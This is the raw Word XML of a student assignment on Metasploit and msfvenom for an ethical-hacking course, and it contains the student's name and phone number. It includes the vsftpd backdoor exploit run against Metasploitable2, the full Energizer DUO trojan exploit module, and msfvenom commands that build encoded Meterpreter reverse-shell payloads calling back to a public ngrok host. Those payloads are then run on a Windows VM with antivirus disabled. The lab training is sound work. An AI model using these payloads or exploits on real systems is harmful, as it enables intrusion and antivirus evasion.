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jpeg" ContentType="image/jpe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ind w:right="2512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margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-795655</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2169160" cy="2169160"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1" name="Picture 1" descr="A logo with a person in a hoodie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a person in a hoodie us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right="2512"/>
        <w:jc w:val="center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4472C4"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>MISSION HACKERS</w:t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FFC000"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>BANGLADESH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56"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="56"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Assignment No-08  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32"/>
          <w:szCs w:val="10"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="10"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"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Assignment Title: Introduction to Exploitation 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 xml:space="preserve">Course Title: Cybersecurity &amp; Ethical Hacking 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  <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="8"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="8"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing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by: 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Name: Istiak Alam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Phone: 01765376101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Submission Date: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>06</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>-0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>-25</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="10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Tools / Topic: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit-Framework </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp; Msfvenom </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="1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</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="10" w:left="-5"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"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to: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MD Sha Jalal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Founder of Mission Hackers Bangladesh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
        <w:ind w:hanging="10" w:left="-5"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/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Part-01 Introduction to </w:t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Metasploit Framework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/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:lineRule="auto" w:line="24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 xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Metasploit Framework</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an open-source penetration testing platform that allows  to find, exploit, and validate vulnerabilities in systems. It's like a “hacker's Swiss Army knife” used by Cybersecurity professionals to test network and system defenses.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🔑 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Key Concepts</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8388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842"/>
        <w:gridCol w:w="7545"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="842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Term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Heading"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Meaning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Exploit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Code that takes advantage of a vulnerability.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Payload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Code that runs on the target after exploitation (e.g., a reverse shell).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Listener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The attacker’s machine that waits for the payload to connect back.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Module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A script/plugin in Metasploit. Can be exploits, scanners, payloads, etc.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Session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A communication link between attacker and victim (e.g., Meterpreter).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🔧 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Let’s Start Metasploit on Kali Linux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Style w:val="Strong"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Start PostgreSQL (Metasploit uses it)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="283"/>
        <w:ind w:hanging="0" w:left="0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sudo systemctl start postgresql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Style w:val="Strong"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Launch Metasploit Console</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="283"/>
        <w:ind w:hanging="0" w:left="0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msfconsole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🎯 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Common Metasploit Commands</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5863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233"/>
        <w:gridCol w:w="3629"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="223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Command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search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for exploit modules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use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Select a specific module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show options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View required options for a module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set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Set parameters like RHOST, LHOST, etc.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exploit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Run the exploit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sessions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 active sessions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sessions -i &lt;ID&gt;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Interact with a session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✅ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Example: Exploiting vsftpd 2.3.4 (Backdoor vulnerability)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1: Start Metasploit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msfconsole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2: Search the exploit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search vsftpd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3: Use the module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use exploit/unix/ftp/vsftpd_234_backdoor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4: Set target IP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set RHOSTS &lt;target-ip&gt;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5: Run the exploit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exploit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we’ll get a shell if it’s successful!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</w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="283"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Part-02 Finding Meterpreter / Payloads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Style w:val="SourceText"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Meterpreter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an advanced, stealthy payload that gives a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>reverse shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the target system. With Meterpreter we can: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Browse the target file system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Capture screenshots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Download/upload files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Open a keylogger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Record microphone audio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  <w:t xml:space="preserve">Let’s See some Demonstration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1 : Start Metasploit-Framework [msfconsole]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1045" cy="480123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4801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2 : type command – ‘help’ to get the Metasploit manual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582739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5827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-4445</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1645920</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5741035" cy="432943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2754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329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Search any payload using show and search command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2219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4 : Search for Meterpreter reverse shell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-4445</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>129540</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5741035" cy="322008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then, here is the list of Meterpreter reverse shell payloads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5 : Search for windows/meterpreter/reverse_tcp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24485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4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if we want to use any payloads then we have to use the payload id’s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use [ID]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6 : Use the reverse_tcp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160972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7 : Setup the LHOST (Your IP) and LPORT (4444)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3810" cy="18211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82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Same as we can Search and use payloads for android system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259207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59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8 : We can see the auxiliary files [show auxiliary]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-4445</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>68580</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5741035" cy="295846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95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Find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a trial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demo payload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: </w:t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 virtual machine and start Metaspoitable2-linux </w:t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Start nmap and scan the Metaspoitable2 IP address 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0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2435" cy="313055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Search for the ftp service version and the payloads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0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2435" cy="130429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130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We can search payload using the Vulnerabilities Scanned by Nmap. And exploit them...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9 : We can Search and show encoders using the command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show encoders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23342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3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10 :  We can Search and show auxiliary using the command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show auxiliary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-4445</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>106680</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5741035" cy="324612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>Part-03</w:t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 </w:t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Generating Payload using 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msfvenom</w:t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18"/>
          <w:szCs w:val="18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Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
        <w:ind w:hanging="10" w:left="-5"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId17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read more...</w:t>
        </w:r>
      </w:hyperlink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Open terminal and see the manual of msfvenom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msfvenom -help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-175260</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>91440</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6082030" cy="276161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2 :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Run Metasploit-framework and msfvenom in terminal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Search for any payload such as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android/meterpreter/reverse_tcp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4 : Show the available options [show options]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302895</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>68580</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5125720" cy="287337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0" cy="287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5 : Now Generate payload using msfvenom and fulfill the required port and host -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msfvenom -p android/meterpreter/reverse_tcp LHOST=&lt;yourIP&gt; LPORT=4444 -e encoder/x86/shikata_ga_nai -i 5 -o payload.apk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-316865</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>267970</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6528435" cy="366839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366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Explanation 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msfvenom : Generate payload for android / windows / unix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-p : Generate payload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LHOST : set lhost with device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LPORT : set lport with device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-e : set encoders for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detect as normal program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-i : set iteration number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-o : Generate output as the given name.apk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LHOST must be a public IP…!! For demonstration we have used private IP of our wlan0 / eth0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Same as we can Generate Payload for windows….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In the metasploit-framework search for windows payloads meterpreter/reverse_tcp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search windows/meterpreter/reverse_tcp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-156845</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>123190</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6389370" cy="164655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60646" r="0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164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2 :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U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se the payload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then show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the requirements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and options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Now Generate payload using msfvenom and fulfill the required port and host -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msfvenom -p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windows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/meterpreter/reverse_tcp LHOST=&lt;yourIP&gt; LPORT=4444 -e encoder/x86/shikata_ga_nai -i 5 -o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payload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.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exe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-318135</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>146050</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6367780" cy="358013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780" cy="3580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Our payload for windows is here ….!!!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>Part-03 Practical Operation using Metasploit-Framwork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We should Study about all the payloads and getting Idea how payload works and how to create them..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34264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34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-4445</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3078480</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5741035" cy="1534160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53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we can see the payload codes in rubi language using cat command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cat energizer_duo_payload.rb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This module requires Metasploit: https://metasploit.com/download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Current source: https://github.com/rapid7/metasploit-framework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class MetasploitModule &lt; Msf::Exploit::Remote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Rank = ExcellentRanking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include Msf::Exploit::Remote::Tcp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include Msf::Exploit::EXE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initialize(info = {})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super(update_info(info,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'Name'           =&gt; 'Energizer DUO USB Battery Charger Arucer.dll Trojan Code Execution',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'Description'    =&gt; %q{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This module will execute an arbitrary payload against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any system infected with the Arugizer trojan horse. This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backdoor was shipped with the software package accompanying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the Energizer DUO USB battery charger.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},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'Author'         =&gt; [ 'hdm' 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'License'        =&gt; MSF_LICENSE,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'References'     =&gt;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['CVE', '2010-0103'],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['OSVDB', '62782'],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['US-CERT-VU', '154421']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'Platform'       =&gt; 'win',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'Targets'        =&gt;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 'Automatic', { } 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'DefaultTarget'  =&gt; 0,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'DisclosureDate' =&gt; '2010-03-05'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register_options(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Opt::RPORT(7777),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])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trojan_encode(str)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str.unpack("C*").map{|c| c ^ 0xE5}.pack("C*")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trojan_command(cmd)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case cmd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:exec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"{8AF1C164-EBD6-4b2b-BC1F-64674E98A710}"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:dir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"{0174D2FC-7CB6-4a22-87C7-7BB72A32F19F}"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:write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"{98D958FC-D0A2-4f1c-B841-232AB357E7C8}"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:read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"{F6C43E1A-1551-4000-A483-C361969AEC41}"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:nop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"{783EACBF-EF8B-498e-A059-F0B5BD12641E}"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:find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"{EA7A2EB7-1E49-4d5f-B4D8-D6645B7440E3}"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:yes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"{E2AC5089-3820-43fe-8A4D-A7028FAD8C28}"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:runonce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"{384EBE2C-F9EA-4f6b-94EF-C9D2DA58FD13}"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:delete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"{4F4F0D88-E715-4b1f-B311-61E530C2C8FC}"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trojan_encode(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[cid.length + 1].pack("V") + cid  + "\x00"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exploit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nam = "C:\\" + Rex::Text.rand_text_alphanumeric(12) + ".exe" + "\x00"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exe = generate_payload_exe + "\x00"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print_status("Trying to upload #{nam}...")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Write file request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sock.put(trojan_command(:write))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sock.put(trojan_encode([nam.length].pack("V")))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sock.put(trojan_encode(nam))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sock.put(trojan_encode([exe.length].pack("V")))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sock.put(trojan_encode(exe))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Required to prevent the server from spinning a loop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sock.put(trojan_command(:nop))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disconnect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Execute the payload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print_status("Trying to execute #{nam}...")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Execute file request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sock.put(trojan_command(:exec))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sock.put(trojan_encode([nam.length].pack("V")))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sock.put(trojan_encode(nam))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Required to prevent the server from spinning a loop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sock.put(trojan_command(:nop))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disconnect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16"/>
          <w:szCs w:val="16"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Hack" w:hAnsi="Hack"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">                               </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Hack" w:hAnsi="Hack"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                                                                                                      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And we can read the code, edit it and understand how a payloads works…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Lets create a payload and attack a Physical Device :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20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20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For public IP we can use ngrok for port &amp; IP forwarding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ngrok http://localhost:8000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-4445</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>91440</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5741035" cy="268414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68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Then we will get a public IP i.e. :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https://b26a127a3292.ngrok-free.app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2 : Open another Terminal &amp; run the Metasploit-framework and Search for windows/meterpreter/reverse_tcp. Also split the terminal in two section by using ctrl+shift+R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-193675</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>175260</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6172835" cy="216344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216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We in generate payload in the right section of the terminal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Use the payload and See the requirement in the options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-4445</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>137160</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5741035" cy="323723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4 : Now Generate the payload using msfvenom :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
        <w:ind w:hanging="10" w:left="-5"/>
        <w:jc w:val="left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msfvenom -p windows/meterpreter/reverse_tcp LHOST=</w:t>
      </w:r>
      <w:hyperlink r:id="rId28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b26a127a3292.ngrok-free.app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LPORT=4444 -e x86/shikata_ga_nai -i 5 -o SystemPayload.exe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-4445</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>7620</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5741035" cy="3402965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40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So, our SystemPayload is ready…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5 : Now, For testing the payload we have windows10 setup into our virtual machine… Open virtual machine and Start windows10 System..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6 : We need a Listener for capture the request from the zombie device. For start listener in the msfconsole -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use multi/handler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125095</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>635</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5741035" cy="3622675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62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Basically we are exploring Generic/shell_reverse_tcp in this multi/handler.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But we have used windows/meterpreter/reversetcp in the payload. So we need to set the payload to windows/meterpreter/reverse_tcp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for this type the command and set payload -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set payload windows/meterpreter/reverse_tcp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7 : Now set up the required lhost and lport in the listener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41275</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>83820</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5741035" cy="4542790"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest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54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8 : Start the listener :- run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-4445</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>106680</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5741035" cy="1467485"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest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46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In the zombie device [windows10] turn off all the antivirus and run the SystemPayload.exe file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-4445</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>88900</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5741035" cy="4690110"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest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69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10 : Run the exe file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then we can access the windows10 device…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Basic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Terminology : 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Exploits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111111"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">These are scripts designed to take advantage of vulnerabilities in systems. Metasploit includes over 1,800 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111111"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>exploits targeting various platforms and services.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Auxiliary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These are non-exploit tools used for tasks like scanning, reconnaissance, and brute-forcing. For example, they can scan networks for open ports or test for weak credentials.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Payloads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These define the actions to be performed after a successful exploit. Common payloads include reverse shells, back-doors, and data exfiltration tools. Payloads can be single-task or staged for more complex operations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E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>ncoders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These help obfuscate payloads to evade detection by antivirus software. Encoders use techniques like encryption and obfuscation to bypass security defenses.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Meterpreter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A stealthy, in-memory payload that provides advanced post-exploitation capabilities, such as file transfer, command execution, and system information gathering.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color w:val="111111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color w:val="111111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Liberation Mono">
    <w:altName w:val="Courier New"/>
    <w:charset w:val="01"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="OpenSymbol">
    <w:altName w:val="Arial Unicode MS"/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ack">
    <w:charset w:val="01"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Hack">
    <w:charset w:val="01"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="fixed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05"/>
        </w:tabs>
        <w:ind w:left="705" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1065"/>
        </w:tabs>
        <w:ind w:left="1065" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1425"/>
        </w:tabs>
        <w:ind w:left="1425" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1785"/>
        </w:tabs>
        <w:ind w:left="1785" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2145"/>
        </w:tabs>
        <w:ind w:left="2145" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2505"/>
        </w:tabs>
        <w:ind w:left="2505" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="6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  <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3225"/>
        </w:tabs>
        <w:ind w:left="3225" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3585"/>
        </w:tabs>
        <w:ind w:left="3585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05"/>
        </w:tabs>
        <w:ind w:left="705" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1065"/>
        </w:tabs>
        <w:ind w:left="1065" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1425"/>
        </w:tabs>
        <w:ind w:left="1425" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1785"/>
        </w:tabs>
        <w:ind w:left="1785" w:hanging="360"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2145"/>
